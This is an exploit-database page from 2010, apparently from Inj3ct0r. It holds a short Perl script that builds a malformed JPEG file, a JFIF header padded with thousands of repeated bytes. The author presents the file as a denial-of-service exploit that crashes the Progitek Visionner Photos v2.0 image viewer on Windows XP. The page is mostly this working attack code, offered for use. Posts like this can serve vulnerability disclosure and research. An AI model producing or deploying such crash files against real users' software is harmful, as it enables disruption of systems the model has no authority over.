Progitek Visionner Photos v2.0 - File Format DOS
Posted on 03 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Progitek Visionner Photos v2.0 - File Format DOS</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================ Progitek Visionner Photos v2.0 - File Format DOS ================================================ # Title: Progitek Visionner Photos v2.0 - File Format DOS # Author: antrhacks # Specifically for Inj3ct0r.com (Exploit DataBase) # Software Link: http://www.01net.com/outils/telecharger/windows/Multimedia/albmums_et_visionneuses/fiches/tele24929.html # Version: 2.00 # Platform: Windows XP SP3 Home edition Fr # Have to place exploit in %HOMEDRIVE%Program FilesProgitekVisioPhotos by default #!/usr/bin/perl my $file= "exploit.jpg"; my $junk= "ÿØÿà JFIF" . "x41x41x41x41x41x41x41x41x41x41" x 1019; open($FILE, ">$file"); print($FILE $junk); close($FILE); print("[+] Your Exploit was created successfully"); # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>